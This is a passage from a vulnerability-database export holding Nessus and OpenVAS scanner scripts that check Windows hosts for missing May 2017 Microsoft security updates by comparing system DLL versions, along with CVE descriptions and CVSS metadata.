arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4016871/windows-10-update-kb4016871\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f546dcfb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4016871.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4016871' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4016871))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:22:43", "description": "This host is missing a critical security\n update (monthly rollup) according to Microsoft KB4019264.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup 
(KB4019264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0231", "CVE-2017-0244", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-8552", "CVE-2017-0268", "CVE-2017-0242", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246", "CVE-2017-0175"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811114", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811114", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019264)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811114\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0175\",\n \"CVE-2017-0190\", \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0220\",\n \"CVE-2017-0222\", \"CVE-2017-0231\", \"CVE-2017-0242\", \"CVE-2017-0244\",\n \"CVE-2017-0245\", \"CVE-2017-0246\", \"CVE-2017-0258\", \"CVE-2017-0263\",\n \"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\", \"CVE-2017-8552\");\n script_bugtraq_id(98121, 98114, 98097, 98110, 98298, 98102, 98103, 98111, 98127,\n 98173, 98275, 98109, 98115, 98108, 98112, 98258, 98259, 98261,\n 98263, 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270,\n 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:07:03 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019264)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to Microsoft KB4019264.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is 
present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue where applications that use msado15.dll stop working after\n installing security update 4015550.\n\n - Deprecated SHA-1 Microsoft Edge and Internet Explorer 11 for SSL/TLS Server\n Authentication.\n\n - Updated Internet Explorer 11's New Tab Page with an integrated newsfeed.\n\n - Includes security updates to Microsoft Graphics Component, Microsoft Windows\n DNS, Windows COM, Windows Server, Windows kernel, and Internet Explorer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n bypass security restrictions, conduct denial-of-service condition, gain access\n to potentially sensitive information and spoof content by tricking a user by\n redirecting the user to a specially crafted website.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019264\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp( win7:2, win7x64:2, win2008r2:2 ) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.1.7601.23775\"))\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23775\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:29:30", "description": "This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019215.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019215)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", 
"CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811113", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811113", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019215)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811113\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0228\", \"CVE-2017-0231\", \"CVE-2017-0238\", \"CVE-2017-0246\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n 
script_bugtraq_id(98121, 98114, 98097, 98298, 98102, 98103, 98127, 98139, 98164,\n 98173, 98237, 98108, 98112, 98113, 98258, 98259, 98261, 98263,\n 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271,\n 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:07:03 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019215)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019215.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue where applications that use msado15.dll stop working after\n installing security update 4015550.\n\n - Deprecated SHA-1 Microsoft Edge and Internet Explorer 11 for SSL/TLS Server\n Authentication.\n\n - Updated Internet Explorer 11's New Tab Page with an integrated newsfeed.\n\n - Includes security updates to Microsoft Graphics Component, Microsoft Windows\n DNS, Windows COM, Windows Server, Windows kernel, and Internet Explorer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n bypass security restrictions, conduct denial-of-service condition, gain access\n to potentially sensitive information and spoof content by tricking a user by\n redirecting the user to a specially crafted website.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64 systems\n\n - Microsoft Windows Server 2012 R2\");\n\n 
script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019215\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.3.9600.18666\"))\n{\n report = 'File checked: ' + sysPath + \"\\System32\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18666\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:44", "description": "This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019214", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019214)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", 
"CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019214)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811112\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0220\", \"CVE-2017-0222\",\n \"CVE-2017-0226\", \"CVE-2017-0238\", \"CVE-2017-0245\", \"CVE-2017-0246\",\n \"CVE-2017-0258\", \"CVE-2017-0263\", \"CVE-2017-0267\", \"CVE-2017-0268\",\n \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\", \"CVE-2017-0272\",\n \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\", \"CVE-2017-0276\",\n \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98114, 98115, 98112, 98111, 98097, 98274, 98273, 98298, 98271,\n 98270, 98272, 98259, 98258, 98237, 98108, 98121, 98127, 98103,\n 98102, 98260, 98261, 98263, 98264, 98265, 98266, 98267, 98268,\n 98139);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 11:57:51 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019214)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019214\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This 
security update includes quality\n and security improvements in Microsoft Graphics Component, Windows COM,\n Windows Server, Windows Kernel and Microsoft Windows DNS\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n and access information from one domain and inject it into another domain, bypass\n security restrictions, conduct denial-of-service condition and gain access to\n potentially sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019214\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.2.9200.22141\"))\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22141\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:25:18", "description": "This host is missing 
important/critical\n security update according to Microsoft Security update KB4019474.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811111", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019474)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811111\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0190\", \"CVE-2017-0212\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0231\",\n \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\",\n \"CVE-2017-0240\", \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98298, 98099, 98102, 98103, 98127, 98139, 98281,\n 98164, 98217, 98173, 98179, 98229, 98234, 98237, 98203, 98208,\n 98108, 98117, 98112, 98113, 98258, 98259, 98261, 98263, 98264,\n 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271, 98272,\n 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:55:53 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019474)\");\n\n script_tag(name:\"summary\", value:\"This host is missing important/critical\n security update according to 
Microsoft Security update KB4019474.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019474\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_is_less(version:edgeVer, test_version:\"11.0.10240.17394\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: Less than 11.0.10240.17394\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-06-08T23:25:38", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019473.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019473)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019473)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 